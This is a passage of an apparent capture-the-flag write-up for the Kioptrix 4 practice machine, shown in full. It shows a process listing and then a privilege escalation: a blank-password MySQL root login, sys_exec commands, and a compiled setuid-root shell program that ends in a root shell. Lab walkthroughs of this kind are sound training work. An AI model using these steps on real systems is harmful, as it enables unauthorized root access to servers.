root      1501  0.0  0.0      0     0 ?        S<   Feb11   0:00 [scsi_eh_0]
root      1502  0.0  0.0      0     0 ?        S<   Feb11   0:00 [scsi_eh_1]
root      1520  0.0  0.0      0     0 ?        S<   Feb11   0:00 [ksuspend_usbd]
root      1526  0.0  0.0      0     0 ?        S<   Feb11   0:00 [khubd]
root      2401  0.0  0.0      0     0 ?        S<   Feb11   0:00 [scsi_eh_2]
root      2641  0.0  0.0      0     0 ?        S<   Feb11   0:00 [kjournald]
root      2808  0.0  0.0   2224   652 ?        S<s  Feb11   0:00 /sbin/udevd --daemon
root      3099  0.0  0.0      0     0 ?        S<   Feb11   0:00 [kgameportd]
root      3236  0.0  0.0      0     0 ?        S<   Feb11   0:00 [kpsmoused]
root      3974  0.0  0.0      0     0 ?        S<   Feb11   0:00 [btaddconn]
root      3978  0.0  0.0      0     0 ?        S<   Feb11   0:00 [btdelconn]
root      4614  0.0  0.0   1716   488 tty4     Ss+  Feb11   0:00 /sbin/getty 38400 tty4
root      4616  0.0  0.0   1716   488 tty5     Ss+  Feb11   0:00 /sbin/getty 38400 tty5
root      4622  0.0  0.0   1716   484 tty2     Ss+  Feb11   0:00 /sbin/getty 38400 tty2
root      4626  0.0  0.0   1716   488 tty3     Ss+  Feb11   0:00 /sbin/getty 38400 tty3
root      4630  0.0  0.0   1716   488 tty6     Ss+  Feb11   0:00 /sbin/getty 38400 tty6
syslog    4663  0.0  0.0   1936   652 ?        Ss   Feb11   0:00 /sbin/syslogd -u syslog
root      4682  0.0  0.0   1872   540 ?        S    Feb11   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      4684  0.0  0.1   3160  2064 ?        Ss   Feb11   0:00 /sbin/klogd -P /var/run/klogd/kmsg
root      4703  0.0  0.0   5316   988 ?        Ss   Feb11   0:00 /usr/sbin/sshd
root      4759  0.0  0.0   1772   524 ?        S    Feb11   0:00 /bin/sh /usr/bin/mysqld_safe
root      4876  0.0  0.1   6528  1332 ?        Ss   Feb11   0:00 /usr/sbin/nmbd -D
root      4878  0.0  0.2  10108  2544 ?        Ss   Feb11   0:00 /usr/sbin/smbd -D
root      4892  0.0  0.0  10108  1028 ?        S    Feb11   0:00 /usr/sbin/smbd -D
root      4893  0.0  0.1   8084  1336 ?        Ss   Feb11   0:00 /usr/sbin/winbindd
root      4900  0.0  0.1   8084  1160 ?        S    Feb11   0:00 /usr/sbin/winbindd
daemon    4914  0.0  0.0   1984   472 ?        Ss   Feb11   0:00 /usr/sbin/atd
root      4925  0.0  0.0   2104   884 ?        Ss   Feb11   0:00 /usr/sbin/cron
root      4947  0.0  0.5  20464  6188 ?        Ss   Feb11   0:01 /usr/sbin/apache2 -k start
www-data  4979  0.0  0.5  20596  5700 ?        S    Feb11   0:00 /usr/sbin/apache2 -k start
www-data  4980  0.0  0.5  20596  5740 ?        S    Feb11   0:00 /usr/sbin/apache2 -k start
www-data  4981  0.0  0.5  20612  5604 ?        S    Feb11   0:00 /usr/sbin/apache2 -k start
www-data  4982  0.0  0.5  20612  5684 ?        S    Feb11   0:00 /usr/sbin/apache2 -k start
www-data  4983  0.0  0.5  20612  5740 ?        S    Feb11   0:00 /usr/sbin/apache2 -k start
dhcp      4996  0.0  0.0   2440   792 ?        Ss   Feb11   0:00 dhclient eth1
root      5003  0.0  0.0   1716   492 tty1     Ss+  Feb11   0:00 /sbin/getty 38400 tty1
www-data  5015  0.0  0.5  20612  5628 ?        S    Feb11   0:00 /usr/sbin/apache2 -k start
www-data  5019  0.0  0.5  20856  5832 ?        S    Feb11   0:00 /usr/sbin/apache2 -k start
root      5486  0.0  0.0   8084   868 ?        S    Feb11   0:00 /usr/sbin/winbindd
root      5487  0.0  0.1   8092  1260 ?        S    Feb11   0:00 /usr/sbin/winbindd
root      5488  0.0  0.3  11360  3736 ?        Ss   Feb11   0:00 sshd: john [priv]
john      5490  0.0  0.1  11512  1912 ?        S    Feb11   0:00 sshd: john@pts/0 
john      5491  0.0  0.3   5888  3796 pts/0    Ss   Feb11   0:00 python /bin/kshell
john      5492  0.0  0.0   1772   488 pts/0    S    Feb11   0:00 sh -c /bin/bash
john      5493  0.0  0.2   5444  2892 pts/0    S    Feb11   0:00 /bin/bash
libuuid   6315  0.0  0.0   2004   300 ?        Ss   Feb11   0:00 uuidd
root     11581  0.5  1.9 126992 20404 ?        Sl   Feb11   0:14 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=330
root     11583  0.0  0.0   1700   560 ?        S    Feb11   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root     11663  0.0  0.0   1564   296 pts/0    S    Feb11   0:00 ./exploit
root     11664  0.0  0.0   1772   484 pts/0    S    Feb11   0:00 sh -c /bin/bash
root     11665  0.0  0.2   4924  2572 pts/0    S+   Feb11   0:00 /bin/bash
root     11725  0.0  0.3  11360  3720 ?        Ss   00:16   0:00 sshd: john [priv]
john     11727  0.0  0.1  11512  1872 ?        R    00:16   0:00 sshd: john@pts/1 
john     11728  0.0  0.3   5964  3844 pts/1    Ss   00:16   0:00 python /bin/kshell
john     11732  0.0  0.0   1772   484 pts/1    S    00:20   0:00 sh -c /bin/bash
john     11733  0.0  0.2   5432  2852 pts/1    R    00:20   0:00 /bin/bash
john     11754  0.0  0.0   2644  1008 pts/1    R+   00:22   0:00 ps aux

I couldn’t help but notice that MySQL was running as “root”. This is typically a no-no, so I attempted to make it my target. I attempted to login with the root user, and a blank password:

1
2
3
4
5
6
7
8
john@Kioptrix4:~$ mysql -u root -h localhost
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4999
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

I figured if it was running as root, I would try running some system commands.

1
2
3
4
5
6
7
mysql> SELECT sys_exec('touch /tmp/thisisatest');
+------------------------------------+
| sys_exec('touch /tmp/thisisatest') |
+------------------------------------+
| NULL                               | 
+------------------------------------+
1 row in set (0.00 sec)

And then to verify that it ran successfully:

1
2
3
4
5
6
john@Kioptrix4:~$ ls -al /tmp
total 12
drwxrwxrwt  3 root root 4096 2012-02-12 00:28 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw-rw----  1 root root    0 2012-02-12 00:26 thisisatest
drwxr-xr-x  2 root root 4096 2012-02-11 11:07 .winbindd

That was a very good sign! I decided my method of exploitation would be to use a C program, set it to SUID root, and run it. I used this C program that I have used many times before.

1
2
3
4
5
6
7
int main()
{
    setresuid(0, 0, 0);
    setresgid(0, 0, 0);
    system( "/bin/bash" );
    return 0;
}

I then compiled it. Note that gcc was not installed, and cpp gave me issues, so I compiled it on the BackTrack VM, and then SFTP’d the file over.

1
root@bt:~# gcc -o exploit exploit.c
1
2
3
john@Kioptrix4:/tmp$ scp root@192.168.95.136:exploit exploit
root@192.168.95.136's password: 
exploit

I then used MySQL to set it to SUID and executable. Before that, I’d have to chown it to root, so that the SUID would actually be useful.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
john@Kioptrix4:/tmp$ mysql -u root -h localhost
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 5001
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> SELECT sys_exec('chown root.root /tmp/exploit');
+------------------------------------------+
| sys_exec('chown root.root /tmp/exploit') |
+------------------------------------------+
| NULL                                     | 
+------------------------------------------+
1 row in set (0.01 sec)

mysql> SELECT sys_exec('chmod +s,a+rwx /tmp/exploit');
+-----------------------------------------+
| sys_exec('chmod +s,a+rwx /tmp/exploit') |
+-----------------------------------------+
| NULL                                    | 
+-----------------------------------------+
1 row in set (0.00 sec)

The /tmp folder now looked like this:

1
2
3
4
5
6
7
8
john@Kioptrix4:/tmp$ ls -al
total 20
drwxrwxrwt  3 root root 4096 2012-02-12 00:31 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rwsrwsrwx  1 root root  166 2012-02-12 00:31 exploit
-rw-r--r--  1 john john  103 2012-02-12 00:31 exploit.c
-rw-rw----  1 root root    0 2012-02-12 00:26 thisisatest
drwxr-xr-x  2 root root 4096 2012-02-11 11:07 .winbindd

From there, it was just as simple as running the exploit.

1
2
3
4
5
john@Kioptrix4:/tmp$ ./exploit 
root@Kioptrix4:/tmp# id
uid=0(root) gid=0(root) groups=1001(john)
root@Kioptrix4:/tmp# whoami
root

And there you have it, root access!

Comments